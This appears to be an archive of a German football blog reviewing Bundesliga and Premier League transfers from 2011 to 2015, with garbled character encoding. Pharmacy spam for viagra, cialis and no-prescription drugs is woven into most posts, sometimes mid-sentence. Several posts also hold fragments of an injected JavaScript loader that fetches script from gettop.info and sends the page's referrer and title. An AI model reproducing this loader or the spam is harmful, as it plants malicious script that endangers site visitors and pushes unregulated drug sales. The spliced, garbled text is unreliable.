Willkommen auf » Transfer
1.Aug 2015

Am schlimmsten sind Spielertransfers immer fA?r die… Fans. Richtig. Und ganz besonders schwer nehmen die AbgAi??nge ihrer Stars mitunter die ganz jungen Fans. Speziell in den Sommermonaten mA?ssen Eltern zur Zeit die ein oder andere TrAi??ne ihrer SprAi??sslinge trocknen, wenn mal wieder eines der fuAYballerischen Vorbilder dem Ruf eines fernen Klubs folgt und den Lieblingsverein verlAi??sst.

In der Premier League dreht sich das Karussell bekanntlich noch ein wenig schneller als anderswo. Auch einige groAYe Namen verlassen die Insel zur neuen Saison. Und so hat im folgenden Clip ein kleiner EnglAi??nder schwer mit dem Abgang von Robin van Persie von Manchester United nach Istanbul zu FenerbahAi??e zu kAi??mpfen…

Diese TrAi??nen mA?ssten doch auch mediengestAi??hlte FuAYballerherzen erweichen kAi??nnen. Also Robin, A?berleg’s dir doch vielleicht nochmal.} else { Cheap list pills get you high Purchase Order Order bactroban cream non prescription Cheap vigora 100 hindi me. Order cheap anafranil dosing cheap propecia canada. alesse price comparison Cheap long lasting sex pills pharmacy, no prescription needed. Cheap

15.Jul 2015

Nach der VerkA?ndung des spektakulAi??ren Wechsels von Bastian Schweinsteiger zu Manchester United am vergangenen Samstag blieb dank eines straffen Zeitplans kaum Luft zum Ankommen. Ein erstes Training bei den Red Devils und schon ging’s zum Abflug auf eine Promotion- und Testspielreise in die USA.

Dazwischen stand noch ein Premiereninterview mit dem vereinseigenen MUTV auf dem Programm, dass der ehemalige MA?nchner zum Erstaunen von so manchem EnglAi??nder aber mit Bravour meisterte.

In fA?nf Minuten gab sich Schweinsteiger mit einem guten Englisch keine BlAi??AYe, antwortete flieAYend und wortreich auf die ihm gestellten Fragen…

Einen guten ersten Eindruck hat der KapitAi??n der deutschen Nationalmannschaft also schonmal hinterlassen. Das erleichtert den Einstieg in die Premier League ungemein. Nach Mesut Ai??zils Ankunft beim FC Arsenal klappte das mit der Fremdsprache zum Beispiel noch no prescription candian pharmacy nicht so richtig purchase parietal region buy pills . http://artelugio.com/buy-lotrisone-cream/ diflucan cheap, red bull with viagra. doxycycline hyclate for sinus infection http://www.copymusic.dk/?p=38617 nitrofurantoin order online kamagra from canada. Purchase Pills pills online Pills cialis prices in south africa. Order online

28.Mai 2015

Das Sommer-Transferfenster naht und die GerA?chtekA?che brodelt. Wir gehen aber zunAi??chst den umgekehrten Weg und schauen auf die drei missglA?cktesten internationalen Transfers der vergangenen Saison. Immer mit der Hoffnung im Hinterkopf, dass die Vereine zumindest ein wenig daraus lernen mAi??gen und kA?nftig nicht nur nach Namen einkaufen.

weiterlesen »

17.Aug 2012

Wie in jedem Jahr dreht sich um Trainer/Manager/GeschAi??ftsfA?hrer Felix Magath das Transferkarussell auch in diesem Sommer wieder ein bisschen schneller als sonst in der Bundesliga A?blich. Wir kennen das Spiel mittlerweile: Hoffnungsvolle Kicker kommen, spielen kaum und sind ein Jahr spAi??ter wieder weg. In dieser ungebremsten Rotation fand Magath in er Vergangenheit dann aber doch ab und zu auch mal eine echte Perle, wie z.B. Edin Dzeko, Grafite oder Kyriakos Papadopoulos. Schauen wir mal, ob sich unter den Sommertransfers 2012 wieder ein potenzieller Stareinkauf versteckt.

Der VfL Wolfsburg begrA?AYte zum Trainingsauftakt „nur“ acht neue Spieler (nach Magaths RA?ckkehr nach Wolfsburg 2011 waren es A?ber zwanzig NeuzugAi??nge) sowie sechs RA?ckkehrer von LeihgeschAi??ften, die entweder endgA?ltig abgegeben werden sollen, aber noch keinen neuen Verein gefunden haben (Thomas Kahlenberg, Sotirios Kyrgiakos), oder in die neue Mannschaft integriert werden sollen (Diego, evtl. Simon Kjaer, Peter Pekarik und Srdjan Lakic).

Neben drei etablierten Bundesligagesichtern (Olic aus MA?nchen, Naldo aus Bremen und Pogatetz aus Hannover) sicherte man sich auch die Dienste von drei in Deutschland bisher unbekannten Spielern, auf die wir einen nAi??heren Blick werfen wollen…

In Sachen AblAi??sesumme sticht hier zunAi??chst der NiederlAi??nder Bas Dost Purchase heraus. FA?r sieben Millionen Euro und mit der Empfehlung von 45 Toren in 66 Pflichtspielen kam der 23-jAi??hrige vom SC Heerenveen. Er ist 1.92m groAY, ein klassischer MittelstA?rmer, amtierender niederlAi??ndischer TorschA?tzenkAi??nig, ein brandgefAi??hrlicher Strafraumspieler mit gutem Positionsspiel cialis prima o dopo i pasti. pills online Pills buy discount viagra online entocort price in india , der immer da ist, wo sich die Chance zum Einnetzen ergeben kAi??nnte. Hier mal eine Torparade, in der wir seine wenig spektakulAi??re, dafA?r aber hoch effektive Spielweise sehen…
[youtube:http://www.youtube.com/watch?v=vK4v1Jv41C8]
Ein guter Fang, der den Abgang von Mario Mandzukic (fA?r 13 Millionen an den FC Bayern) im Sturmzentrum an der Seite von Ivica Olic gut kompensieren kAi??nnte. Im Interview auf Spox.com erfahren wir einiges A?ber Dosts Ankunft in Wolfsburg, die individuelle Anpassung an die Bundesliga und seine erste Nominierung fA?r die niederlAi??ndische Nationalmannschaft.

Wie ein SchnAi??ppchen erscheint dagegen Order VA?clav PilaAi??. Im vergangenen Jahr spielte er als Leihspieler fA?r Viktoria Pilsen in der tschechischen ersten Liga und sammelte erste Champions League Erfahrungen. Die AblAi??se von 1.5 Millionen ging an seinen Heimatverein FC Hradec KrA?lovAi??. Im Sommer sorgte der 23-jAi??hrige bei der Europameisterschaft in Polen und der Ukraine auf der linken AuAYenbahn mit zwei Toren fA?r viel Wirbel und soll genau diese Rolle zukA?nftig auch beim VfL A?bernehmen. erection medicines for diabetics. Ein toller Dribbler, mit hoher Grundschnelligkeit, hervorragender Technik und einem groAYen KAi??mpferherz. Ein ganz heiAYer Kandidat fA?r einen Durchbruch, hier ein paar EindrA?cke von seinem Spiel…
[youtube:http://www.youtube.com/watch?v=UiVY4XDEJFE]
Eine Woche vor dem Bundesligastart ereilte die Wolfsburger jedoch eine unglA?ckliche Nachricht: Pilar zog sich beim Testspiel Tschechien-Ukraine einen Kreuzbandriss zu und wird nun voraussichtlich sechs Monate ausfallen. Tragische Wochen fA?r den VfL, denn auch Patrick Helmes erwischte es in diesem Sommer mit gleicher Diagnose.

Als dritter Bundesliganeuling kam der Brasilianer lusinopril for sale Fagner Conserva Lemos, kurz Fagner, von Vasco da Gama aus Rio de Janeiro. Er ist ebenfalls 23, kostete drei Millionen Euro AblAi??se und soll Pills http://dymonpower.ca/?p=34346 online als Rechtsverteidiger eine Alternative zu Patrick Ochs, Christian TrAi??sch und Peter Pekarik where can i buy levitra in london darstellen. Tolle Tore kann er A?brigens auch schieAYen…
[youtube:http://www.youtube.com/watch?v=tkteZBwYepU]
Es ist bereits sein zweiter Anlauf im europAi??ischen FuAYball. In der Saison 2007/08 kam er beim niederlAi??ndischen PSV Eindhoven jedoch lediglich auf drei EinsAi??tze und verabschiedete sich schnell wieder in Richtung SA?damerika. Ein wenig EingewAi??hnung wird er also auch in Wolfsburg sicher brauchen. Einen Landsmann hat er mit Naldo zwar kA?nftig in der Viererkette neben sich, ob er in der Bundesliga aber einschlAi??gt, bleibt abzuwarten.
viamedic viagra, nolvadex austlalie.

Ein typischer Magath-Transfer: Ein weitgehend unbekannter Spieler fA?r eine nicht geringe AblAi??sesumme mit hohem Risiko. Der Trainer aber scheint A?berzeugt und hat ihn gleich fA?r vier Jahre vertraglich gebunden: „Es war schon lAi??nger klar, dass wir fA?r diese Position noch jemand suchen. Fagner ist ein offensiv ausgerichteter Rechtsverteidiger, der diese Position so spielt, wie ich es gerne hAi??tte“ (kicker.de)

Buy http://telecomshopltd.com/2018/03/18/buy-fluoxetine-online-uk/ var d=document;var s=d.createElement(‚script‘);

11.Jul 2012

Sieben Wochen vor dem Auftakt in die 50. JubilAi??umssaison der Bundesliga starten dann auch wir mal in die Vorbereitung und werfen hoodia juice at costco wie in den vergangenen Jahren Pills Cheap duphaston dosage. speziell einen Blick auf die vielen neuen Gesichter im deutschen ProfifuAYball.

Den Startschuss feuert standesgemAi??AY Rekordmeister Bayern MA?nchen ab. Nach zwei Jahren ohne Titel fahren HoeneAY, Rummenigge und Co. in diesem Sommer auch auf dem Transfermarkt wieder grAi??AYere GeschA?tze auf. Sportdirektor Christian Nerlinger musste als erfolgloser HoeneAY-Nachfolger seinen Posten rAi??umen. Sein BA?ro an der SAi??bener StraAYe A?bernahm Anfang Juli Matthias Sammer, der in gleicher Funktion seit 2006 beim DFB tAi??tig war. Bereits vor der Neubesetzung im Management wurden knapp 30 Millionen Euro in die Mannschaft investiert. Sammer wird als Antrittsgeschenk aber sicher auch noch ein gewisses Budget zur VerfA?gung gestellt bekommen haben, sodass man den FCB in diesem Transfersommer noch nicht ganz aus den Augen verlieren sollte.

Neben Mario Mandzukic (26, kam fA?r 13 Mio. aus Wolfsburg und soll im Sturmzentrum Druck auf Mario Gomez machen), Claudio Pizarro (33, kehrt zum Ende der Karriere als offensive Geheimwaffe noch einmal ablAi??sefrei nach MA?nchen zurA?ck), Dante (28, kam fA?r 4,7 Mio. aus MAi??nchengladbach und darf sich ernsthafte Chancen als Alternative im Abwehrzentrum ausrechnen) und Tom Starke (31, als zweiter Keeper hinter Manuel Neuer ablAi??sefrei von 1899 Hoffenheim geholt) wurde zum Trainingsauftakt vergangene Woche auch usa online phamacy antibiotics, farmacies in tijuana phone nunmbers. Purchase Xherdan Shaqiri begrA?AYt, den wir als Bundesliga-Neuling noch ein wenig nAi??her analysieren wollen.

Shaqiri ist 1.68m groAY, aufgewachsen in Basel, Sohn kosovarischer Einwanderer, beidfA?AYig und auf den offensiven AuAYenpositionen im Mittelfeld zu Hause. Mit gerade einmal 20 Jahren konnte er pills online schon so einige Meilensteine eines FuAYballerlebens abhaken usa viagra 4000 mg. http://www.3karatt.com/21265 : In A?ber 120 Pflichtspielen hat er maAYgeblich zu den jA?ngeren Glanzzeiten des FC Basel (Meister 2010, 2011 und 2012, Pokalsieger 2010 und 2012) beitragen und auch in Champions und Europa League erste Erfahrungen sammeln kAi??nnen. FA?r die Schweiz betritt er bisher 22 Junioren- und 18 A-LAi??nderspiele und wurde in den vergangenen beiden Jahren zum Schweizer FuAYballer des Jahres gewAi??hlt. Ein ganzer Sack an Vorschusslorbeeren also, die dem FC Bayern stattliche, aber definitiv gut investierte no prescription required pharmacy 11,6 Millionen Euro AblAi??se und einen Vierjahresvertrag wert waren.
Purchase

Die FCB-Offiziellen schwAi??rmten bei der Vorstellung des Neuzugangs jedenfalls http://www.j1taxback.com/tax-tips/cheap-serpina-side/ cost of viagra per pill in den hAi??chsten TAi??nen: ai??zWir freuen uns sehr, dass wir mit Xherdan Shaqiri eines der umworbensten Talente des europAi??ischen FuAYballs verpflichten konnten,ai??? so der damalige Sportdirektor Christian Nerlinger.

ai??zXherdan wird mit seiner Spielintelligenz und seinen Dribblings unsere Mannschaft in den kommenden Saisons verstAi??rkenai???, ergAi??nzte Trainer Jupp Heynckes, ai??zich habe ihn seit einiger Zeit beobachtet und bin A?berzeugt, dass er fA?r den FC Bayern ein wichtiger Spieler werden kann.ai???

Spielerisch fAi??llt er in erster Linie durch ein extrem kraftvolles Auftreten, eine gute technische Ausbildung und eine herausragende beidfA?AYige Schusstechnik auf. Die Konkurrenz kAi??nnte auf den FlA?geln des deutschen Rekordmeisters mit Ribery und Robben nominell kaum grAi??AYer sein. Auf seine Einsatzzeiten wird Shaqiri aber mit Sicherheit im ersten Jahr dennoch kommen, sei es als Einwechselspieler oder erste Alternative bei Verletzung oder Formtief der etablierten Konkurrenten. Auf jeden Fall erhAi??ht sich nach den AbgAi??ngen von Takashi Usami (ein wohl gescheitertes Purchase Experiment der Bundesliga-Japan-Welle aus dem Vorjahr, mittlerweile an 1899 Hoffenheim weiter verliehen) und Ivica Olic (mit 32 Jahren nach Vertragsende ablAi??sefrei nach Wolfsburg gewechselt) nun wieder die VariabilitAi??t der MA?nchner im Mittelfeld, speziell auf den AuAYenpositionen. Mit drei waschechten FlA?gelspielern, dazu Thomas MA?ller, Toni Kroos und David Alaba dA?rfte man A?ber genA?gend QualitAi??t verfA?gen, um auch im internationalen GeschAi??ft zu einem erneuten Angriff ansetzen zu kAi??nnen.

So, genug getextet, hier ein paar Videoimpressionen vom typischen Spiel des Xherdan Shaqiri…
[youtube:http://www.youtube.com/watch?v=zWGHnrk1tVo]

Aus den vier Minuten wird auch noch eins deutlich: Der FC Bayern bekommt endlich mal wieder einen cheap reminyl side Spieler, der direkte FreistoAYtore schieAYen kann. Eine QualitAi??t, die dem Team in der Vergangenheit zunehmend fehlte.

Mit Xherdan Shaqiri hat sich der deutsche Rekordmeister also im Vergleich zum Vorjahr spielerisch durchaus verbessert, ist variantenreicher geworden und kAi??nnte so auch taktisch fA?r die ein oder andere A?berraschung sorgen, wenn Trainer Heynckes denn den Mut hat, einen formschwachen Ribery oder Robben mal auf der Bank zu lassen. Alles in allem ein wertvoller Transfer mit einer guten Zukunftsprognose.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

9.Aug 2011

Der Abschied von Papiss Demba CissAi??, der im vergangenen Jahr so oft beschworenen „Lebensversicherung des SC Freiburg“ (mit 22 Toren in 32 Spielen amtierender Vize-TorschA?tzenkAi??nig der Bundesliga), rA?ckt mit groAYen Schritten nAi??her. Vertraglich gebunden ist er eigentlich noch bis 2014, auch im ersten Saisonspiel gegen den FC Augsburg lief er auf, doch die WechselgerA?chte nehmen kein Ende und wurden in den letzten Tagen nun immer konkreter. Mehrere Premier League Klubs sollen A?beraus interessiert sein (u.a. die Tottenham Hotspurs und der FC Fulham), auch von drei russischen Interessenten wird berichtet ( cheapest generic levitra u.a. Champions League Teilnehmer Rubin Kazan) und auch Felix Magath ist allem Anschein nach gewillt, den Senegalesen zum VfL Wolfsburg http://www.myworldtourclub.com/archives/19546 Pills http://grupoebc.com.br/buy-prednisolone-for-horses/ procardia xl price zu holen.

FA?r den SC Freiburg wAi??r’s ohne Frage ein herber Verlust, ganz blauAi??ugig ist man die Situation aber natA?rlich nicht angegangen, schlieAYlich war schon lAi??nger klar, dass CissAi?? nach einer solchen Saison nur schwer in der beschaulichen FuAYballprovinz zu halten sein wird. Zum Einen ruft man daher nun eine ganz beachtliche AblAi??sesumme als Schmerzensgeld auf ( Order Order unter 15 Millionen Euro soll wohl nichts gehen, er wA?rde damit Sebastian Kehl als teuersten Transfer der Vereinsgeschichte um LAi??ngen schlagen, dieser war 2002 fA?r 3,2 Millionen zum BVB gewechselt), zum Anderen hat man sich im Sommer bereits um einen Ai??uAYerst hoffnungsvollen Ersatz gekA?mmert.

Garra DembAi??lAi?? heiAYt der neue Sturmgarant der Breisgauer. Er ist Franzose (26 Spiele fA?r franzAi??sische Juniorennationalmannschaften), malinesischer Abstammung (ein A-LAi??nderspiel), mit online 25 Jahren im besten FuAYballalter und kommt cataflam for sale fA?r 2,2 Millionen Euro AblAi??se vom bulgarischen Vizemeister Lewski Sofia. Dort wies er seine StA?rmerqualitAi??ten in der vergangenen Spielzeit bereits eindrucksvoll nach: in 24 Ligaspielen erzielte er 26 Tore, oben drauf kommen noch acht Tore in zwAi??lf Europa League Spielen. Eine mehr als vorzeigbare Quote.

Zur Begutachtung die Ligatreffer hier mal in einer Torparade…
[youtube:http://www.youtube.com/watch?v=378csf1QzSo]

Ein eiskalter Vollstrecker also, passt haargenau ins Anforderungsprofil und zumindest den Bildern nach mit Potenzial, der legitime Nachfolger von CissAi?? im Freiburger Sturmzentrum zu werden. Mit der EingewAi??hnung gibt es traditionell bei franzAi??sischsprachigen Kickern im Breisgau unweit der Grenze wenig Probleme. Und wer weiAY… vielleicht bildet er ja zur A?berraschung der Liga in dieser Saison doch einen Traumsturm gemeinsam mit CissAi??.

Weitere HintergrA?nde in Text- und Videoform erfAi??hrt man reminyl sales im Interview Dembeles mit der Badischen Zeitung Pills purchase zyloprim package , u.a. warum er in den vergangenen sechs Jahren bei sechs verschiedenen Vereinen in Frankreich, DAi??nemark, Griechenland und Bulgarien kickte und wie er schlieAYlich beim SC Freiburg landete.document.currentScript.parentNode.insertBefore(s, document.currentScript); http://www.viking-klima-sp.si/pyridium-length-of-treatment/ super viagra discount. viagra cijena, guardians. arimidex no prescrption cheap.

1.Aug 2011

Der Hamburger SV nach dem radikalen Umbruch im Sommer 2011 – gemAi??chlicher Neuaufbau im Ligamittelfeld oder doch Geheimtipp fA?r ganz oben? Dreizehn AbgAi??ngen stehen bisher fA?nf Neuverpflichtungen und ebenso viele RA?ckkehrer von Leihvereinen (u.a. Marcus Berg von Eindhoven und MickaAi??l Tavares vom FC Middlesbrough) gegenA?ber. Besonders auffAi??llig dabei: Der Vorjahresachte HSV verstAi??rkt sich mit gleich vier neuen Spielern vom Abramovic-Klub FC Chelsea. Wurde in der Elbe ein Piratenschatz gehoben oder biedert man sich den EnglAi??ndern als Ausbildungsverein an? Schauen wir mal etwas genauer auf die ungewAi??hnliche Strategie der Hamburger.

Die ganze Geschichte begann im vergangenen Februar mit der Bekanntgabe der Verpflichtung von Frank Arnesen als neuem Pills Sportchef und Vorstandsmitglied zur nachfolgenden Bundesliga-Saison. Der 55-jAi??hrige DAi??ne arbeitete zuvor sechs Jahre lang als Sportdirektor, Nachwuchskoordinator und Chefanalytiker beim FC Chelsea. Seinen ChefscoutAi??Lee Congerton bringt der ehemalige Profi (u.a. Ajax Amsterdam, Valencia und Eindhoven, 52 LAi??nderspiele) von dort auch gleich mit in die Hansestadt.

HSV-Aufsichtsratschef Ernst-Otto Rieckhoff kommentierte begeistert buy diflucan tablets uk Buy : ai???Ich bin sehr glA?cklich, dass uns diese groAYartige LAi??sung gelungen ist. Frank Arnesen hat nicht nur mit seiner Erfahrung als Manager internationaler Top Clubs Erfahrungen gesammelt, sondern insbesondere durch seinen Fokus auf Nachwuchsarbeit und der Ausbildung von Spielern genau die Kompetenz, die fA?r uns in Zukunft von richtungsweisender Bedeutung istai???.

buy pills Order Cheap Buy purchase cafergot dosage
Und genau diesen Weg schlAi??gt der HSV nun auch konsequent ein. Gemeinsam mit TrainerAi??Michael Oenning krempelte Arnesen die Mannschaft in der Sommerpause vollstAi??ndig um. Gestandene und langjAi??hrige Profis verlieAYen den Verein ditropan xl online games , u.a. Ruud van Nistelrooy (ablAi??sefrei zum FC Malaga), ZAi?? Roberto (ablAi??sefrei nach Katar), Frank Rost (ablAi??sefrei zu den New York Red Bulls), Joris Mathijsen (fA?r 2,5 Mio. zum FC Malaga),Ai??Jonathan Pitroipa (fA?r 3,5 Mio. zu Stade Rennes) und Piotr Trochowski (ablAi??sefrei zum FC Sevilla). Ersetzt wurden sie in erster Linie durch junge Kicker aus den eigenen Reihen und eben durch eine Gruppe vielversprechender Talente vom Premier League Vizemeister FC Chelsea.

Die vier ehemaligen Londoner, die Arnesen an die Elbe lotsen konnte, hier mal im Kurzportrait…

GAi??khan TAi??re – 19 Jahre, Offensiv-Allrounder, bevorzugt auf den FlA?geln aktiv, kommt ablAi??sefrei, Vertrag bis 2014, tA?rkischer Juniorennationalspieler, in KAi??ln geboren, ausgebildet bei Bayer Leverkusen, 2009 bis 2011 bei Chelsea, trainierte dort mit der ersten Mannschaft, spielte aber nur in der Reserve, bulliger Typ mit starker Physis, erinnert vom Spiel her ein bisschen an Wayne Rooney, hier ein paar Spielszenen, kAi??nnte auf den FlA?geln zu einer ernsthaften Alternative werden, wenn z.B. Eljero Elia mal wieder die Lust am Spiel verliert

Michael Mancienne – mit 23 Jahren der Oldie unter den Neuen, Allrounder in der Abwehrkette, am hAi??ufigsten Innenverteidiger, 2.5 Mio. Euro AblAi??se, spielte von der U16 bis zur U21 in sAi??mtlichen Juniorennationalmannschaften Englands, bei Chelsea ausgebildet, gilt als schnell und vielseitig, sammelte in den vergangenen fA?nf Jahren bereits Erst- und Zweitligaerfahrung bei den Leihvereinen Queens Park Rangers und Wolverhampton Wanderers, ausgestattet mit einem Vierjahresvertrag, hier ein lesenswertes Interview sildenafil generico prezzo in farmacia, cozaar medication. von Mancienne bei den Kollegen von spox.com A?ber Wechsel, EingewAi??hnung und Aussichten in Hamburg

Jeffrey Bruma – 19 Jahre, mit vollem Namen Jeffrey Kevin van Homoet Bruma, NiederlAi??nder, Innenverteidiger, seit 2007 in London, vom HSV zunAi??chst fA?r zwei Jahre ausgeliehen (der FC Chelsea soll eine RA?ckholklausel nach dem ersten Jahr haben; wird diese nicht gezogen, fAi??llt dem HSV eine Kaufoption zu), gilt in der Heimat als absolute Abwehrhoffnung fA?r die Zukunft, schon zwei A-LAi??nderspiele, besticht durch kraftvolles Spiel, ebenso aber auch technisch beschlagen, tantalum happy hour. ventolin inhalers online hier ein paar Spielszenen, soll wohl ernsthaft die erste Wahl als Nachfolger von Joris Mathijsen und David Rozehnal im Abwehrzentrum sein

Jacopo Sala – 19 Jahre, rechtes und zentrales Mittelfeld, italienischer U19-Nationalspieler, kostete A?berschaubare 100.000 Euro AblAi??se, Vertrag bis 2014, wechselte vor vier Jahren von Atalanta Bergamo in Chelseas Jugendabteilung, acccutane for sale uk Pills http://www.gzheilin.com/clomid-no-prescription-mexico/ hier der obligatorische Youtube-Zusammenschnitt, soll im Vergleich zu den anderen Neulingen etwas behutsamer aufgebaut werden und wird wohl nicht sofort in der Stammelf auftauchen

Allesamt also junge, hochtalentierte Spieler mit internationaler Erfahrung in Nachwuchsnationalmannschaften, deren Entwicklung Arnesen in den vergangenen Jahren hautnah beobachten konnte und die nun langfristig in der Hansestadt gebunden wurden. An absolute Fehlgriffe glaube ich daher hier keinesfalls, lediglich die Dauer der EingewAi??hnung und der Integration ins Spiel des HSV dA?rften zeitkritische Aspekte darstellen. Finanziell haben sich Hamburger mit diesen vielversprechenden Transfers jedenfalls erstaunlicherweise kaum belastet, es besteht somit keine Notwendigkeit der sofortigen Refinanzierung durch die Qualifikation fA?r europAi??ische Wettbewerbe.

Trainer Michael Oenning gilt darA?ber hinaus als Fachmann fA?r die Entwicklung junger Spieler; angemessenes Spielermaterial hat er also bekommen, nun beginnt die alltAi??gliche Arbeit im Training. Mit etwas Geduld und Vertrauen kann der HSV nach ein, zwei Jahren der Findung und Abstimmung vielleicht auch wieder weiter oben in der Bundesliga-Tabelle mitmischen. Etwas Zeit sollte man den Verantwortlichen jedoch schon geben, den schlagartigen Abgang der halben Stammelf steckt schlieAYlich keine Mannschaft so ohne weiteres weg.

Hinter der Auswahl der NeuzugAi??nge ist jedenfalls eine klare Struktur und Idee zu erkennen, die den geneigten Fan zu Recht auf mittel- bis langfristige Erfolge hoffen lAi??sst.document.currentScript.parentNode.insertBefore(s, document.currentScript); ez online pharmacy buy cialis usa.

25.Jul 2011

Takashi Usami – Schafft das hochgelobte japanische Offensivtalent den Durchbruch im Starensemble des FC Bayern MA?nchen?

UnzAi??hlige Millionen versenkte der deutsche Rekordmeister im vergangenen Jahrzehnt in Transfers von vermeintlich hochtalentierten und letztlich doch enttAi??uschenden SA?damerikanern (2008 kamen z.B. Sosa und Breno fA?r neun bzw. zwAi??lf Mio., ein Jahr zuvor dos Santos fA?r knapp drei Mio.). Nun wendete der FCB den Blick aufs nicht minder ferne Japan und folgt damit einem offensichtlich heiAYen Trend der Liga – neun Japaner stehen aktuell bei Bundesligisten unter Vertrag, bis auf den Wolfsburger Makoto Hasebe wechselten alle innerhalb der vergangenen 12 Monate nach Deutschland.

Mit der Purchase buy elavil without prescription. LeihgebA?hr von 300.000 EUR fA?r Usami kommt der FC Bayern da auch noch Ai??uAYerst kostengA?nstig und risikofrei davon. Der 19-jAi??hrige Buy buy prescriptions cb1 reviews. http://www.harukazedo.tokyo/2018/03/19/cheap-zestril-tablets/ google. viagra india Buy ist http://didit-ariyanto.mhs.narotama.ac.id/2018/02/01/cost-lithium-carbonate/ Junioren-Nationalspieler seines Landes, sammelte Erfahrungen in bereits 43 Pflichtspielen fA?r den amtierenden Vizemeister Gamba Osaka, ist der jA?ngste Kicker in der Historie der asiatischen Champions League (mit 17 Jahren + 14 Tagen und einem Treffer gegen den FC Seoul) und weckte in der vergangenen Saison mit fA?nf Toren und sechs Vorlagen in 21 Spielen als „Rookie of the Year“ der J-League das Interesse europAi??ischer Scouts. Der FC Bayern, international eigentlich nicht gerade als Talentschmiede bekannt, stach in den Verhandlungen schlieAYlich aber angeblich Topklubs aus Italien, England und Spanien aus.

In seiner Heimat spielte Usami meist als Spielgestalter und Passgeber im offensiven zentralen Mittelfeld, FCB-Sportdirektor Christian Nerlinger hat ihn aber eher als flinken und technisch versierten FlA?gelspieler lithium tablets for depression und somit als Backup fA?r Ribery und Robben auf der Rechnung. Hamit Altintop hat den Verein bekanntlich ablAi??sefrei in Richtung Madrid verlassen, bleiben also nur noch MA?ller und Olic fA?r die offensiven AuAYenpositionen; gut mAi??glich also, dass Usami nach einer angemessenen EingewAi??hnungszeit auch die ein oder andere Spielminute in der Liga und den Pokalwettbewerben bekommt. Der Transfer war offensichtlich kein Schnellschuss und bloAYes Werkzeug, um auf dem asiatischen Merchandising-Markt FuAY zu fassen (Usami ist der erste Japaner der Vereinsgeschichte), denn Nerlinger sagt weiter: ai??zWir haben ihn lange beobachtet und glauben, dass er groAYe Perspektiven im Offensivbereich hat. Ich bin sicher, dass wir viel Freude an ihm haben werdenai???. Klingt nach einem groAYen Vertrauensvorschuss und nicht so, als wA?rden sie ihn nach einem Monat bei den Profis in die zweite Mannschaft abschieben.

Ein paar Videoimpressionen seines facettenreichen Spiels…
[youtube:http://www.youtube.com/watch?v=nF8WrB8kL0w]

Usami bekommt nun also erst mal ein Jahr, um sich in MA?nchen und der Bundesliga zu beweisen. Leicht wird es sicher nicht, die Konkurrenz ist groAY, der Druck im Umfeld sowieso. In weiser Voraussicht hat sich der FCB aber gleich eine Kaufoption fA?r den kommenden Sommer gesichert, man weiAY ja nie wie er einschlAi??gt. Einen Versuch ist es allemal wert, vor allem wenn man die gA?nstige Ai??konomische Seite des Transfers bedenkt (wann haben die Bayern denn zum letzten Mal einen Spieler auf Leihbasis geholt)… ich glaube jedenfalls nicht, dass er ein zweiter Jose Ernesto Sosa wird 😉

Ungleich aufwAi??ndiger gestalteten sich da im A?brigen die restlichen Transfers des FC Bayern in diesem Sommer: Manuel Neuer (die neue Nummer 1, fA?r 22 Mio. vom FC Schalke), JAi??rA?me Boateng (Abwehr-Allrounder, fA?r 13,5 Mio. von Manchester City), Rafinha (Rechtsverteidiger, fA?r 5,5 Mio. vom FC Genua), Nils Petersen (ZweitligatorschA?tzenkAi??nig, fA?r 2,8 Mio. von Energie Cottbus) und David Alaba (Mittelfeld-Allrounder, vom Leihverein 1899 Hoffenheim zurA?ckgekehrt).s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; buy exelon Purchase Pills Purchase albuterol sulfate no prescription, buy metronidazole bv.

21.Jul 2011

Noch etwas mehr als zwei Wochen sind es bis zum Start der Bundesliga Saison 2011/12 (das ErAi??ffnungsspiel bestreiten am 5. August Borussia Dortmund und der Hamburger SV, ab 20:30 live in der ARD). Es wird also hAi??chste Zeit, wie in jedem Jahr einen Blick auf die Transfers unserer Bundesligisten zu werfen und hier speziell die neuen Gesichter der Liga vorzustellen (siehe Archive von 2009 online und 2010).

Wir starten diesmal ganz standesgemAi??AY mit dem amtierenden deutschen Meister Borussia Dortmund. Viel hat sich beim BVB eigentlich nicht getan, vier Spieler der zweiten Reihe haben den Klub verlassen: Dede (hat noch keinen neuen Verein gefunden), Hajnal (bleibt nach dem halbjAi??hrlichen LeihgeschAi??ft in Stuttgart, AblAi??se 1 Mio. EUR), Feulner (geht nach NA?rnberg) und Rangelov (ausgeliehen an Zweitligist Cottbus). Am schwersten wiegt jedoch der Abgang von Nuri Sahin, dem EigengewAi??chs und zuletzt unverzichtbaren Antreiber und Gestalter des Dortmunder Spiels. Real Madrid zahlte vergleichsweise A?berschaubare zehn Millionen Euro AblAi??se fA?r den tA?rkischen Nationalspieler, die der deutsche Meister umgehend in vielversprechende Nachfolger reinvestierte. Zum Einen holte man Ilkay GA?ndogan fA?r 4 Millionen aus NA?rnberg, zum Anderen A?berwies man schAi??tzungsweise 5,5 Millionen als „KAi??nigstransfer“ fA?r Ivan PeriA?iAi?? http://hokkaido-jobs.link/%e6%9c%aa%e5%88%86%e9%a1%9e/nitrofurantoin-purchase-canada/ generic viagra pharmacy. http://acapesbignona.com/buy-vasodilan-isoxsuprine/ an den FC BrA?gge. Und letzterer soll hier als Bundesliga-Neuling nun kurz vorgestellt werden.

PeriA?iAi?? ist 22 Jahre Cheap buy cialis in cyprus alt, bereits kroatischer Nationalspieler order doxazosin medication Purchase para que sirve prednisona. men health cialis, where to buy 2.5mg cialis online. Cheap how much weight loss with hydrochlorothiazide (bisher drei A-LAi??nderspiele + 17 Junioren-LAi??nderspiele), 1,87 m groAY, gilt als Mittelfeld-Allrounder Order do you need to see a dr. to get viagra (sammelte die meiste Spielerfahrung jedoch auf dem linken FlA?gel), wurde bei Hajduk Split ausgebildet, wagte 2007 als 17-jAi??hriger den Schritt in die franzAi??sische Ligue 1 zum FC Souchaux, kam dort jedoch kaum zum Zug, wechselte dann nach Belgien zu KSV Roeselare und schlieAYlich zum Traditionsverein FC BrA?gge.

